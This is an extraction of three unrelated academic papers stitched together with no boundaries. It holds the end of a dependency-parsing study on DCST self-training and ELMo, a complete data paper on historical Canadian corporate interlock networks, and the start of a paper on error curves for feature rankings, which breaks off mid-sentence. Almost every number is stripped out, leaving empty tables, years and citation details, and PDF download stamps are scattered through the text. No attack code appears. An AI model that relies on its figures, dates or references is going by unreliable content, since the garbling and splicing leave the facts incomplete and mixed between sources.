final hybrid parser. table presents a comparison between the base parser to our dcst algorithms. all in all, the dcst models outperform the base parser across all comparisons, with dcst-ens being the best model in all cases except from one. the analysis indicates that in some cases a bilstm tagger with a given tagging scheme directly improves the capability of the final parser to capture the corresponding information. for example, dcst- dr, whose tagging scheme considers the distance of each word from the root of the tree, performs best (ontonotes) or second best (ud) on the ad- dr metric compared to all other models except for the dcst-ens model that contains the dcst- dr model as a component. likewise, dcst-rpe, which encodes information about the pos tag of the head word for every word in the sentence, is the best performing model in terms of pos head error. in contrast to the relative success of dcst-rpe and dcst-dr in improving specific capabilities of the parser, dcst-nc, our weakest model across experimental setups, is also the weakest dcst model in this error analysis, even when considering the ad-nc metric that measures success in predicting the number of children a word has in the tree. sentence length adaptation we next aim to test whether dcst can enhance a parser trained on short sentences so that it can better parse long sentences. dependency parsers perform better on short sentences, and we would expect self-training to bring in high-quality syntactic information from automatically parsed long sentences. for this aim, we replicate the ontonotes wb in-domain experiment, except that we train the parser on all training set sentences of up to words, use the training set sentences with more than words as unlabeled data for sequence tagger training (algorithm , step ), and test the final parser on all test sentences with more than words. table shows that dcst-ens improves the base parser in this setup by . uas and las points. dcst-lm achieves only a marginal uas improvement while cvt substantially harms the parser. this result further supports the value of our methods and encourages future research in various under-resourced setups. elmo embeddings finally, we turn to invest- igate the impact of deep contextualized word em- beddings, such as elmo (peters et al., ), on the base parser and on the dcst-ens model. to this end, we replace the glove/fasttext word embeddings from our original experiments with downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april bc bn mz nw pt tc wb model uas las uas las uas las uas las uas las uas las uas las base+elmo . . . . . . . . . . . . . . base+elmo+g . . . . . . . . . . . . . . dcst-ens+elmo . . . . . . . . . . . . . . table : lightly supervised ontonotes results with elmo embeddings. cu da fa id lv sl sv tr ur vi model uas las uas las uas las uas las uas las uas las uas las uas las uas las uas las base+elmo . . . . . . . . . . . . . . . . . . . . base+elmo+g . . . . . . . . . . . . . . . . . . . . dcst-ens+elmo . . . . . . . . . . . . . . . . . . . . table : lightly supervised ud results with elmo embeddings. downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april the multilingual elmo word embeddings of che et al. ( ). we follow che et al. ( ) and define the elmo word embedding for word i as: wi = w elmo · ∑ j= h elmo i,j , where w elmo is a trainable parameter and helmoi,j is the hidden representation for word i in the j’th bilstm layer of the elmo model, which remains fixed throughout all experiments. we experiment with three models: base + elmo: the biaffine parser fed by the elmo word embeddings and trained on the labeled training data; base + elmo + gating (g): the biaffine parser fed by our original word embeddings, and elmo word embeddings are integrated through our gating mechanism. training is done on the labeled training data only; and dcst-ens + elmo: our ensemble parser where the bilstm taggers and the base parser are fed by the elmo word embeddings. tables (ontonotes) and (ud) summarize the results in the lightly supervised setups with training sentences. as in previous experiments, dcst-ens+elmo is the best performing model in both setups. although base+elmo+g is superior in the cu and tr (las) setups, it is inferior in all ontonotes domains. note also that dcst-ens+elmo improves the uas results of dcst-ens from tables and on all ontonotes domains and on out of ud languages. conclusions we proposed a new self-training framework for dependency parsing. our dcst approach is based on the integration of (a) contextualized em- bedding model(s) into a neural dependency parser, where the embedding models are trained on word tagging schemes extracted from the trees generated by the base parser on unlabeled data. in multilingual lightly supervised and domain adaptation experiments, our models consistently outperform strong baselines and previous models. in future work we intend to explore improved word tagging schemes, sequence tagging archi- tectures, and integration mechanisms. we shall also consider cross-language learning where the lexical gap between languages should be overcome. acknowledgments we would like to thank the action editor and the reviewers, as well as the members of the ie@technion nlp group for their valuable feedback and advice. this research was partially funded by an isf personal grant no. / . references steven abney. . understanding the yarowsky algorithm. computational linguistics, ( ): – . gabor angeli, melvin jose johnson premkumar, and christopher d. manning. . leveraging linguistic structure for open domain information extraction. in proceedings of acl. mikel artetxe, gorka labaka, and eneko agirre. . a robust self-learning method for fully unsupervised cross-lingual mappings of word embeddings. in proceedings of the th annual meeting of the association for computational linguistics (volume : long papers), pages – . melbourne. avrim blum and tom mitchell. . combining labeled and unlabeled data with co-training. in proceedings of the eleventh annual conference on computational learning theory, pages – . wanxiang che, yijia liu, yuxuan wang, bo zheng, and ting liu. . towards better ud parsing: deep contextualized word em- beddings, ensemble, and treebank concatena- tion. in proceedings of the conll shared task: multilingual parsing from raw text to universal dependencies, pages – . wenliang chen, youzheng wu, and hitoshi isahara. . learning reliable information for dependency parsing adaptation. in proceedings of the nd international conference on com- putational linguistics-volume , pages – . wenliang chen, yue zhang, and min zhang. . feature embedding for dependency parsing. in proceedings of coling , the th international conference on computational linguistics: technical papers, pages – . kevin clark, minh-thang luong, christopher d. manning, and quoc v. le. . semi- supervised sequence modeling with cross-view training. in proceedings of the conference on empirical methods in natural language processing, pages – . downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april djork-arné clevert, thomas unterthiner, and sepp hochreiter. . fast and accurate deep network learning by exponential linear units (elus). in th international conference on learning representations, iclr , san juan, puerto rico, conference track proceedings. jacob devlin, ming-wei chang, kenton lee, and kristina toutanova. . bert: pre-training of deep bidirectional transformers for language understanding. in proceedings of the conference of the north american chapter of the association for computational linguistics: human language technologies, volume (long and short papers), pages – , minneapolis, mn. timothy dozat and christopher d. manning. . deep biaffine attention for neural dependency parsing. in th international conference on learning representations, iclr , toulon, france, conference track proceedings. rotem dror, gili baumer, segev shlomov, and roi reichart. . the hitchhikers guide to testing statistical significance in natural language processing. in proceedings of the th annual meeting of the association for computational linguistics (volume : long papers), pages – , melbourne. jack edmonds. . optimum branchings. journal of research of the national bureau of standards b, ( ): – . dan goldwasser, roi reichart, james clarke, and dan roth. . confidence driven un- supervised semantic parsing. in proceedings of the th annual meeting of the association for computational linguistics: human language technologies, pages – . edouard grave, piotr bojanowski, prakhar gupta, armand joulin, and tomas mikolov. . learning word vectors for languages. in proceedings of the international conference on language resources and evaluation (lrec ). christian hadiwinoto and hwee tou ng. . a dependency-based neural reordering model for statistical machine translation. in thirty-first aaai conference on artificial intelligence. yulan he and deyu zhou. . self-training from labeled features for sentiment analysis. information processing & management, ( ): – . daniel hershcovich, omri abend, and ari rappoport. . a transition-based directed acyclic graph parser for ucca. in proceedings of the th annual meeting of the association for computational linguistics (volume : long papers), volume , pages – . eduard hovy, mitchell marcus, martha palmer, lance ramshaw, and ralph weischedel. . ontonotes: the % solution. in proceedings of the human language technology conference of the naacl, companion volume: short papers. kenji imamura and eiichiro sumita. . nict self-training approach to neural machine translation at nmt- . in proceedings of the nd workshop on neural machine translation and generation, pages – . diederik p. kingma and jimmy ba. . adam: a method for stochastic optimization. in proceedings of iclr. eliyahu kiperwasser and miguel ballesteros. . scheduled multi-task learning: from syntax to translation. transactions of the association for computational linguistics, : – . eliyahu kiperwasser and yoav goldberg. . simple and accurate dependency parsing using bidirectional lstm feature represen- tations. transactions of the association for computational linguistics, : – . omer levy and yoav goldberg. . dependency- based word embeddings. in proceedings of the nd annual meeting of the association for computational linguistics (volume : short papers), volume , pages – . xuezhe ma, zecong hu, jingzhou liu, nanyun peng, graham neubig, and eduard hovy. . stack-pointer networks for dependency parsing. in proceedings of the th annual meeting of the association for computational linguistics (volume : long papers), pages – . downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april diego marcheggiani, anton frolov, and ivan titov. . a simple and accurate syntax-agnostic neural model for dependency-based semantic role labeling. in proceedings of conll. bryan mccann, james bradbury, caiming xiong, and richard socher. . learned in translation: contextualized word vectors. in advances in neural information processing systems, pages – . david mcclosky, eugene charniak, and mark johnson. a. effective self-training for parsing. in proceedings of the main conference on human language technology conference of the north american chapter of the association of computational linguistics, pages – . david mcclosky, eugene charniak, and mark johnson. b. reranking and self-training for parser adaptation. in proceedings of the st international conference on computational linguistics and the th annual meeting of the association for computational linguistics, pages – . david mcclosky, eugene charniak, and mark johnson. . automatic domain adaptation for parsing. in human language technologies: the annual conference of the north american chapter of the association for computational linguistics, pages – . ryan mcdonald, joakim nivre, yvonne quirmbach-brundage, yoav goldberg, dipanjan das, kuzman ganchev, keith hall, slav petrov, hao zhang, oscar täckström, claudia bedini, núria bertomeu castelló, and jungmee lee. . universal dependency annotation for multilingual parsing. in proceedings of the st annual meeting of the association for computational linguistics (volume : short papers), volume , pages – . rada mihalcea. . co-training and self- training for word sense disambiguation. in proceedings of the eighth conference on computational natural language learning (conll- ) at hlt-naacl . joakim nivre, mitchell abrams, željko agić, lars ahrenberg, lene antonsen, maria jesus aranzabe, gashaw arutie, masayuki asahara, luma ateyah, mohammed attia, aitziber atutxa, liesbeth augustinus, elena badmaeva, miguel ballesteros, esha banerjee, sebastian bank, verginica barbu mititelu, john bauer, sandra bellato, kepa bengoetxea, riyaz ahmad bhat, erica biagetti, eckhard bick, rogier blokland, victoria bobicev, carl börstell, cristina bosco, gosse bouma, sam bowman, adriane boyd, aljoscha burchardt, marie candito, bernard caron, gauthier caron, gülşen cebiroğlu eryiğit, giuseppe g. a. celano, savas cetin, fabricio chalub, jinho choi, yongseok cho, jayeol chun, silvie cinková, aurélie collomb, çağrı çöltekin, miriam connor, marine courtin, elizabeth davidson, marie-catherine marneffe, valeria paiva, arantza ilarraza, carly dickerson, peter dirix, kaja dobrovoljc, timothy dozat, kira droganova, puneet dwivedi, marhaba eli, ali elkahky, binyam ephrem, tomaž erjavec, aline etienne, richárd farkas, hector fernandez alcalde, jennifer foster, cláudia freitas, katarı́na gajdošová, daniel galbraith, marcos garcia, moa gärdenfors, kim gerdes, filip ginter, iakes goenaga, koldo gojenola, memduh gökırmak, yoav goldberg, xavier gómez guinovart, berta gonzáles saavedra, matias grioni, normunds grūzı̄tis, bruno guillaume, céline guillot-barbance, nizar habash, jan hajič, jan hajič jr., linh hà mỹ, na-rae han, kim harris, dag haug, barbora hladká, jaroslava hlaváčová, florinel hociung, petter hohle, jena hwang, radu ion, elena irimia, tomáš jelı́nek, anders johannsen, fredrik jørgensen, hüner kaşıkara, sylvain kahane, hiroshi kanayama, jenna kanerva, tolga kayadelen, václava kettnerová, jesse kirchner, natalia kotsyba, simon krek, sookyoung kwak, veronika laippala, lorenzo lambertino, tatiana lando, septina dian larasati, alexei lavrentiev, john lee, phu%o%ng lêhò̂ng, alessandro lenci, saran lertpradit, herman leung, cheuk ying li, josie li, keying li, kyungtae lim, nikola ljubešić, olga loginova, olga lyashevskaya, teresa lynn, vivien macketanz, aibek makazhanov, michael mandl, christopher manning, ruli manurung, cătălina mărănduc, david mareček, katrin marheinecke, hector martinez alonso, andré martins, jan mašek, yuji matsumoto, ryan mcdonald, gustavo mendonça, niko miekka, anna missilä, cătălin mititelu, yusuke miyao, simonetta montemagni, amir more, laura downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april moreno romero, shinsuke mori, bjartur mortensen, bohdan moskalevskyi, kadri muischnek, yugo murawaki, kaili müürisep, pinkey nainwani, juan ignacio navarro horñiacek, anna nedoluzhko, gunta nešpore- bērzkalne, lu%o%ng nguyẽ̂n thi, huyè̂n nguyẽ̂n thi minh, vitaly nikolaev, rattima nitisaroj, hanna nurmi, stina ojala, adédayò. olúòkun, mai omura, petya osenova, robert östling, lilja Øvrelid, niko partanen, elena pascual, marco passarotti, agnieszka patejuk, siyao peng, cenel-augusto perez, guy perrier, slav petrov, jussi piitulainen, emily pitler, barbara plank,thierry poibeau, martin popel, lauma pretkalniņa, sophie prévost, prokopis prokopidis, adam przepiórkowski, tiina puolakainen, sampo pyysalo, andriela rääbis, alexandre rademaker, loganathan ramasamy, taraka rama, carlos ramisch, vinit ravishankar, livy real, siva reddy, georg rehm, michael rießler, larissa rinaldi, laura rituma, luisa rocha, mykhailo romanenko, rudolf rosa, davide rovati, valentin roşca, olga rudina, shoval sadde, shadi saleh, tanja samardžić, stephanie samson, manuela sanguinetti, baiba saulı̄te, yanin sawanakunanon, nathan schneider, sebastian schuster, djamé seddah, wolfgang seeker, mojgan seraji, mo shen, atsuko shimada, muh shohibussirri, dmitry sichinava, natalia silveira, maria simi, radu simionescu, katalin simkó, mária šimková, kiril simov, aaron smith, isabela soares- bastos, antonio stella, milan straka, jana strnadová, alane suhr, umut sulubacak, zsolt szántó, dima taji, yuta takahashi, takaaki tanaka, isabelle tellier, trond trosterud, anna trukhina, reut tsarfaty, francis tyers sumire uematsu, zdeňka urešová, larraitz uria, hans uszkoreit, sowmya vajjala, daniel niekerk, gertjan noord, viktor varga, veronika vincze, lars wallin, jonathan north washington, seyi williams, mats wirén, tsegay woldemariam, tak-sum wong, chunxiao yan, marat m. yavrumyan, zhuoran yu, zdeněk žabokrtský, amir zeldes, daniel zeman, manying zhang, and hanzhi zhu. . universal dependencies . . joakim nivre, marie-catherine de marneffe, filip ginter, yoav goldberg, jan hajic, christopher d. manning, ryan mcdonald, slav petrov, sampo pyysalo, natalia silveira, reut tsarfaty, and daniel zeman. . universal dependencies v : a multilingual treebank collection. in lrec. jeffrey pennington, richard socher, and christopher d. manning. . glove: global vectors for word representation. in proceedings of the conference on empirical methods in natural language processing (emnlp), pages – . matthew peters, mark neumann, mohit iyyer, matt gardner, christopher clark, kenton lee, and luke zettlemoyer. . deep contextualized word representations. in proceedings of the conference of the north american chapter of the association for computational linguistics: human language technologies, volume (long papers), pages – , new orleans, la. barbara plank and željko agić. . distant supervision from disparate sources for low- resource part-of-speech tagging. in proceedings of the conference on empirical methods in natural language processing, pages – , brussels. barbara plank and gertjan van noord. . effective measures of domain similarity for parsing. in proceedings of the th annual meeting of the association for computational linguistics: human language technologies- volume , pages – . roi reichart and ari rappoport. . self- training for enhancement and domain adaptation of statistical parsers trained on small datasets. in proceedings of the th annual meeting of the association of computational linguistics, pages – . sebastian ruder and barbara plank. . strong baselines for neural semi-supervised learning under domain shift. in the th annual meeting of the association for computational linguisticsmeeting of the association for computational linguistics. alexander m. rush, roi reichart, michael collins, and amir globerson. . improved parsing and pos tagging using inter-sentence consistency constraints. in proceedings of the joint conference on empirical downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april methods in natural language processing and computational natural language learning, pages – . piotr rybak and alina wróblewska. . semi- supervised neural system for tagging, parsing and lematization. in proceedings of the conll shared task: multilingual parsing from raw text to universal dependencies, pages – . motoki sato, hitoshi manabe, hiroshi noji, and yuji matsumoto. . adversarial training for cross-domain universal dependency parsing. in proceedings of the conll shared task: multilingual parsing from raw text to universal dependencies, pages – . ehsan shareghi, yingzhen li, yi zhu, roi reichart, and anna korhonen. . bayesian learning for neural dependency parsing. in proceedings of the conference of the north american chapter of the association for computational linguistics: human language technologies, volume (long and short papers), pages – . anders søgaard. . simple semi-supervised training of part-of-speech taggers. in proceedings of the acl conference short papers, pages – . drahomı́ra spoustová and miroslav spousta. . dependency parsing as a sequence labeling task. prague bulletin of mathematical linguistics, : – . nitish srivastava, geoffrey hinton, alex krizhevsky, ilya sutskever, and ruslan salakhutdinov. . dropout: a simple way to prevent neural networks from overfitting. journal of machine learning research, ( ): – . mark steedman, miles osborne, anoop sarkar, stephen clark, rebecca hwa, julia hockenmaier, paul ruhlen, steven baker, and jeremiah crim. . bootstrapping statistical parsers from small datasets. in proceedings of the tenth conference on european chapter of the association for computational linguistics- volume , pages – . michalina strzyz, david vilares, and carlos gómez-rodrıguez. . viable dependency parsing as sequence labeling. in proceedings of naacl-hlt , pages – . ian tenney, patrick xia, berlin chen, alex wang, adam poliak, r. thomas mccoy, najoung kim, benjamin van durme, samuel r. bowman, dipanjan das, and ellie pavlick. . what do you learn from context? probing for sentence structure in contextualized word representations. in proceedings of iclr. kristina toutanova, xi victoria lin, wen- tau yih, hoifung poon, and chris quirk. . compositional learning of embeddings for relation paths in knowledge base and text. in proceedings of the th annual meeting of the association for computational linguistics (volume : long papers), volume , pages – . ashish vaswani, noam shazeer, niki parmar, jakob uszkoreit, llion jones, aidan n. gomez, ĺukasz kaiser, and illia polosukhin. . attention is all you need. in advances in neural information processing systems, pages – . oriol vinyals, ĺukasz kaiser, terry koo, slav petrov, ilya sutskever, and geoffrey hinton. . grammar as a foreign language. in advances in neural information processing systems, pages – . alex wang, jan hula, patrick xia, raghavendra pappagari, r. thomas mccoy, roma patel, najoung kim, ian tenney, yinghui huang, katherin yu, shuning jin, berlin chen, benjamin van durme, edouard grave, ellie pavlick, and samuel r. bowman. . can you tell me how to get past sesame street? sentence-level pretraining beyond language modeling. in proceedings of the th conference of the association for computational linguistics, pages – . john wieting and douwe kiela. . no train- ing required: exploring random encoders for sentence classification. in proceedings of iclr. vikas yadav and steven bethard. . a survey on recent advances in named entity recognition from deep learning models. in proceedings of the th international conference on computational linguistics, pages – . downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april david yarowsky. . unsupervised word sense disambiguation rivaling supervised methods. in rd annual meeting of the association for computational linguistics. kelly w. zhang and samuel r. bowman. . language modeling teaches you more than translation does: lessons learned through auxiliary syntactic task analysis. in proceedings of the emnlp workshop blackboxnlp: analyzing and interpreting neural networks for nlp, pages – , brussels. xiang zhang, junbo zhao, and yann lecun. . character-level convolutional networks for text classification. in advances in neural infor- mation processing systems, pages – . zhi-hua zhou and ming li. . tri-training: exploiting unlabeled data using three classi- fiers. ieee transactions on knowledge & data engineering, ( ): – . yftah ziser and roi reichart. . pivot based language modeling for improved neural domain adaptation. in proceedings of the conference of the north american chapter of the association for computational lin- guistics: human language technologies, volume (long papers), pages – , new orleans, la. downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april introduction previous work background: the biaffine parser deep contextualized self-training representation learning (steps and ) the final hybrid parser (step ) evaluation setups experiments results ablation analysis and discussion conclusions © authors. this work is licensed under the creative commons attribution . license (https://creativecommons.org/licenses/by/ . /). connections issue | vol. article | doi: . /connections- - networks of canadian business elites: historical corporate interlock networks circa abstract this paper provides details about a historical dataset of canadian corporations and business elites who served on corporate boards circa . the source of this corporate interlock data is the directory of directors in canada, , a public domain volume listing canadi- an public companies in canada. because these data are thought to be of interest not only to network researchers, but also to business historians and management scholars, an attempt has been made to make the data as easy to use as possible. supplementary information has also been added to the network files provided. all of the individu- als and companies in the dataset have been geolocated. the proper census division a company was located in has also been add- ed so that the networks can be combined with other publicly availa- ble data from the period. two sets of graph files are provided in csv format with other formats provided on the author’s website. the first file contains corporations as the nodes with directors as edges. the second file has the individual directors as nodes and edges connect- ing them are corporate boards individuals both sat on. keywords corporate interlock network, canadian business elites, business history. the dataset presented in this paper offers a unique view into the relationships of business elites in canada in the early part of the last century. canadian business was marked by the existence of powerful families that occupied the boards of many corporations. also pres- ent, but less common, were more widely held firms with more entrepreneurial owners. at that time, ca- nadians considered themselves very much a part of the british empire. the major financial and business centers at the time were montreal and toronto. al- though, the mid-western city of winnipeg was a rapidly growing regional center as well. this dataset allows for the identification of major corporations and the ties that exist between them through corporate directors. the coverage in the data presented here is the complete volume of the direc- tory of directors in canada published in canada by w.r. houston ( ). the entire volume is now public domain and available for download (at https://archive. org/details/directorydirector housuoft). houston had close ties to the toronto stock exchange that only grew over time. for example, his offices were originally located nearby the exchange, but eventually they were relocated to the exchange itself (murphy, ). in the sections that follow, i will outline the details of the graph and associated data that were collect- ed. the data that this paper describes are available as two different network projections. the first is a graph describing the relationships between firms as nodes, with directors as edges relating these organizations. the other file describes the network of individuals that served on the boards of the firms. in this file, the nodes represent people and the edges are the boards that they have common membership on. both are projec- tions of the same data for ease of use by those less fa- miliar with network visualization and analysis software. jon mackay waterloo institute for complexity and innovation (wici), the university of waterloo, waterloo, canada. e-mail: jon.mackay@gmail.com. networks of canadian business elites: historical corporate interlock networks circa the format and contents of the corporate graph file the format of the files provided with this paper is comma separated value (csv) format. this is a plain text format that is usable in spreadsheets and most network visualization and analysis programs. the data files are also available on the author’s website (http:// jgmackay.com) in other file formats, including graph exchange format (gexf), which is an open graph format supported by many popular network analysis software packages. this standard was developed by the gephi consortium and supported by gephi net- work visualization software, which is freely available (bastian et al., ). the gexf file format has been designed to be open and work with a variety of soft- ware packages. information about attributes table lists the attributes of nodes and edges that exist in the graph files and includes a brief explana- tion of the attribute. weights the edges in the graphs are weighted to represent whether nodes are joined by one or more edges. for example, in the graph, where the companies are the nodes, two companies may have a tie be- tween them with a weight greater than one if there are multiple directors that sit on both corporate boards. spatial information in addition to the names of the companies in the dod, some additional information has been added. first, the address of each company has been parsed from the dod and broken down into more useful compo- nents. in this graph, each firm has a city and province attribute for its location. i have used this information to geolocate each firm so there are additional fields for latitude and longitude. using a mapping layout that accepts latitude and longitude pairs, a user can easily visualize the locations of corporations or directors on a map of one’s choos- ing. (i suggest gephi as a network visualization tool.) most companies and individuals are located in can- ada. however, the data show directors located in the uk and europe and some companies located in south america. finally, i have also linked the geographical loca- tion of companies to the canadian census data files. the field uid_cd_ contains the unique identifi- cation number for the census division numbers in the census files. map files composed of the appro- priate gis shapefiles should be available from library archives canada or from the canadian government’s open data initiative website. it should be noted that corporations listed in the files are, for the most part, public firms. the dod also table . attributes in graph files. node attribute field meaning field present in city city where the firm is located company, person company name of the company company, person cprov the letter province code used in the canadian census company initials person’s initials person lastname family last name person latitude location information company, person longitude location information company, person prov province where the firm is located company, person uid_cd_ unique regional identifier field in the canadian census company connections contains some information about regional chambers of commerce and other organizations. the format and contents of the person graph file the graph file containing corporate executives and di- rectors from the dod has the firms as edges and the nodes as people. this file contains location data (longi- tude and latitude pairs) for both individuals and the firms they worked for. additionally, there is information about the province and city each individual was located in. perhaps of most interest for historians of the period are the fields with the full names of individuals. this allows researchers to construct sociograms of the elites of ca- nadian business of the day. additional historical back- ground and information about regional elites based on this data is also available (mackay, ). limitations the key limitations of the data presented here have al- ready been alluded to; it is unknown whether the dod is representative of all of the public companies in canada at the time, or whether it was biased toward compa- nies listed on the toronto stock exchange. at the time, montreal was the home of the major stock exchange, although toronto was also considered a major center. it seems reasonable to assume that w.r. houston would not overlook major firms listed in montreal. however, he may not have been aware of a number of companies that were listed in winnipeg. the preface to the dod makes it clear that there were a number of non-respons- es to houston’s survey of directors of public companies in canada. however, these limitations are perhaps for- givable given that there does not exist a canonical list of canadian public companies from this period. although imperfect, the dod provides one of the most complete listings of directors and firms from that period (for dis- cussion of these points, see mackay, ). the data used to create the graph files were ex- tracted using optical character recognition (ocr) software from electronic versions of the dod and then manually corrected by the author and assis- tants. ultimately assigning a tie between nodes in the graphs relies upon the names being listed consist- ently throughout the dod. it is also assumed that the ocr and text cleaning process found and corrected any mis-spellings so that the common ties could be correctly created. every attempt has been made to clean and translate the data appropriately. conclusion this paper has presented an overview of two pro- jections of graphs based on information extracted from the dod. the graph files have been created, so that they are easily usable by non-specialists. additional information has also been added, which makes integrating these networks with canadian national census data from possible or plotting locations of directors or companies using longitude and latitude pairs. it is hoped that this information will be of use to both business historians and net- work scholars. acknowledgments the author would like to thank the participants in the canadian business history association conference, from public interest to private profit at the rotman school of management, university of toronto for their helpful feedback on this project. the author is grateful to professor leslie hannah for his insights on this data and public corporations in canada during this period and also to the cen- tre for corporate reputation in the saïd business school at the university of oxford for funding this project. jon mackay is an affiliated researcher with the waterloo institute for complexity and innovation (wici) at the university of waterloo, canada. his interests include network theory, corporate governance, and canadian business history. references bastian, m., heymann, s., & jacomy, m. . gephi: an open source software for exploring and manipu- lating networks, . presented at the international aaai conference on weblogs and social media. houston, w. r. . directory of directors in can- ada, . toronto: houston’s standard publications, available at: http://archive.org/details/directorydirector- housuoft mackay, j. . canadian regional and national business elites in : who was connected, who wasn’t and why? a history of socially responsible business, c. – : – . palgrave macmillan, cham. murphy, g. j. . early canadian financial state- ment disclosure legislation. the accounting historians journal, ( ): – . error curves for evaluating the quality of feature rankings error curves for evaluating the quality of feature rankings ivica slavkov , matej petković , , pierre geurts , dragi kocev , and sašo džeroski , jozef stefan institute, ljubljana, slovenia jozef stefan international postgraduate school, ljubljana, slovenia université de liège, liège, belgium abstract in this article, we propose a method for evaluating feature ranking algorithms. a feature ranking algorithm estimates the importance of descriptive features when predicting the target variable, and the proposed method evaluates the correctness of these importance values by computing the error measures of two chains of predictive models. the models in the first chain are built on nested sets of top-ranked features, while the models in the other chain are built on nested sets of bottom ranked features. we investigate which predictive models are appropriate for building these chains, showing empirically that the proposed method gives meaningful results and can detect differences in feature ranking quality. this is first demonstrated on synthetic data, and then on several real-world classification benchmark problems. subjects algorithms and analysis of algorithms, artificial intelligence, data mining and machine learning keywords feature ranking, error curves, evaluation introduction in the era of data abundance, we face high-dimensional problems increasingly often. sometimes, prior to applying predictive modeling (e.g., classification) algorithms to such problems, dimensionality reduction may be necessary for a number of reasons, including computational reasons. by keeping only a limited number of descriptors (features), a classifier can also achieve better predictive performance, since typically, a portion of the features strongly influence the target variable, and the others can be understood as (mostly) noise. this dimensionality reduction corresponds to the task of feature selection (guyon et al., ). a task related to it is feature ranking. this is a generalization of feature selection where, in addition to simply telling apart relevant features from irrelevant ones (nilsson et al., ), one also assesses how relevant are they for predicting the target variable. in machine learning, feature ranking is typically seen either as a preprocessing or as a postprocessing step. in the former case, one actually tackles the feature selection problem by first computing the feature relevance values, and then keeping only the features whose relevance is above some user defined threshold. in the second case, feature ranking is obtained after building a predictive model in order to explain it, for example (arceo- vilas et al., ). for black box models, such as neural networks, this may be the only way to understand their predictions. how to cite this article slavkov i, petković m, geurts p, kocev d, džeroski s. . error curves for evaluating the quality of feature rankings. peerj comput. sci. :e doi . /peerj-cs. submitted august accepted october published december corresponding author matej petković, matej.petkovic@ijs.si academic editor sebastian ventura additional information and declarations can be found on page doi . /peerj-cs. copyright slavkov et al. distributed under creative commons cc-by . http://dx.doi.org/ . /peerj-cs. mailto:matej.�petkovic@�ijs.�si https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://www.creativecommons.org/licenses/by/ . / http://www.creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ in some application domains, such as biology or medicine, feature ranking may be the main point of interest. if we are given data about the expression of numerous genes, for a group of patients, and the patients’ clinical state (diseased/healthy), one can find good candidate genes that influence the health status of the patients, which gives us a deeper understanding of the disease. due to the prominence of the feature ranking task, there exist many feature ranking methods. simpler methods assess the relevance of each feature independently ignoring the other features (χ statistics, mutual information of the feature and the target variable) and their possible interactions. a prominent example that shows the myopic nature of such approaches is the case when the target variable y is defined as y = xor (x , x ) where x and x are two binary features. ignoring x when computing the relevance of x (and vice-versa) would result in assessing x as completely irrelevant, that is, as random noise. more sophisticated methods assess relevance of each feature in the context of the others. they are typically based on some predictive model, for example, random forest feature ranking (breiman, ), or optimization problem (nardone, ciaramella & staiano, ), but not necessarily, cf. for example, relieff (robnik-Šikonja & kononenko, ) and the work of li & gu ( ). however, there is no unified definition of feature importance, and actually, every feature ranking algorithm comes with its own (implicit) definition. therefore, different methods typically introduce different feature importance scores: deciding which of them is the best is a very relevant, but also very challenging task that we would like to address in this article. more precisely, we continue and extend our previous work (slavkov et al., ), where we proposed and evaluated a quantitative score for the assessment of feature rankings. here, we propose a new feature ranking evaluation method that can evaluate feature rankings in a relative sense (deciding which of the feature rankings is better), or in an absolute sense (assessing how good is a feature ranking). the method is based on constructing two chains of predictive models that are built from the top-ranked and bottom-ranked features. the predictive performances of the models in the chain are then shown on graphs of so called forward feature addition (ffa) and reverse feature addition (rfa) curves, which reveal how the relevant features are distributed in the ranking(s). an important property of the proposed method is that it does not need any prior ground truth knowledge of the data. we investigate the performance of the proposed evaluation approach under a range of scenarios. to begin with, we prove the potential of the ffa and rfa curves by using them in setting which employs synthetic data. next, we investigate the use of different types of predictive models for constructing the curves, thus considerably extending the preliminary experiments by slavkov et al. ( ). furthermore, we apply the proposed evaluation approach to a large collection of benchmark datasets. compared to slavkov et al. ( ), we have included new high-dimensional datasets. the results of the evaluation, in a nutshell, show that the ffa and rfa curves are able to discern the best ranking among multiple proposed feature rankings. slavkov et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the remainder of this article is organized as follows. “related work” outlines related work, “method for evaluating feature rankings” describes in detail the proposed method for constructing error curves. next, “empirical evaluation of ffa/rfa curve properties” discusses the properties of the error curves when applied to synthetic data. we then give the results of the experimental evaluation on benchmark datasets in “feature ranking comparison on real-worlds datasets”. “conclusions” concludes with a summary of our contributions and an outline of possible directions for further work. in the appendices, we give additional information about generating synthetic data (appendix a ), measuring distance between rankings (appendix a ), and comparative evaluation of feature ranking methods (appendix a ). in appendix a , detailed experimental results are given. related work the evaluation of feature rankings is a complex and unsolved problem. typically, feature rankings are evaluated on artificially generated problems, while evaluation on real world problems remains an issue approached indirectly. to begin with, when the ground truth ranking is known, one can transform the problem of feature ranking evaluation into an evaluation of classification predictive model (jong et al., ) as follows. first, a ranking is computed. then, for every threshold, the numbers of relevant features (true positives) and irrelevant features (false positives) with the feature relevance above the threshold are computed. from these values, a roc curve can be created and the area underneath it computed. another possible approach is to compute separability (robnik-Šikonja & kononenko, ), that is, the minimal difference between the feature importance of a relevant feature and the feature importance of an irrelevant feature. if this difference is positive, then the relevant features are separated from the irrelevant ones, otherwise they are mixed. however, both approaches are more applicable to feature selection problems and are too coarse for feature rankings problem, since they only differentiate between relevant and irrelevant features. spearman’s rank correlation coefficient between the computed and the ground truth ranking might be more appropriate. the main shortcoming of the upper approaches is that they demand the ground truth ranking. in real world scenarios, this is not known, which makes the upper approaches useless. nevertheless, using synthetic data and the controlled environment offers a good starting point for showing the usefulness of a feature ranking evaluation method, as we shall also see later. an approach that overcomes the issue of unknown ground truth ranking bases on selecting k top-ranked features and building a predictive model that uses only these features to predict target variable. the ranking whose top-ranked features result in the model with the highest predictive performance, is proclaimed the best. since it is now always clear which value of k should be chosen, this can be done for multiple 